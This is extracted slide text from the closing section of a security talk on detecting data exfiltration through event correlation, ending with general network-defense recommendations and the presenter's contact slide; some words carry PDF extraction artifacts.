  • 34. Catching  Data  Exfiltra5on   •  Granular  restric5ons  on  sensi5ve  files  and  directories  to  specific   groups  or  individuals,  alert  on  any  abnormal  file  access  /  read  /   write  /  etc.     •  DNS  exfiltra5on  or  someEmes  even  ICMP  Tunneling  in  high  security   environments     •  Non-­‐SSL  over  ports  443  /  8443,  encrypted  TCP  over  ports  80  /  8080   •  Abnormal  web  server  ac5vity,  newly  created  files,  etc.   34  
  • 35. It  all  comes  down  to  Event  Correla5on   35  
  • 37. Closing  Thoughts…   •  Don’t  be  hard  on  the  outside,  sos  and  chewy  on  the  inside…   •  Implement  Layer  3  (network)  SegmentaEon  and  Least  User  Privilege   •  Understand  your  environment  and  log  data  so  that  you  can  accurately   correlate  physical  and  cyber  events   •  Implement  URL  filtering,  stateful  packet  inspecEon,  and  binary  analysis   •  AcEvely  alert  on  and  respond  at  the  earliest  signs  of  lateral  movement  and   reconnaissance  observed  within  your  environment   •  The  earlier  you  can  detect  aWackers  the  beWer…   37  
  • 38. Thank  You!   38     QUESTIONS?     Greg  Foss   OSCP,  GAWN,  GPEN,  GWAPT,  GCIH,  CEH   Senior  Security  Research  Engineer   Greg.Foss[at]logrhythm.com   @heinzarelli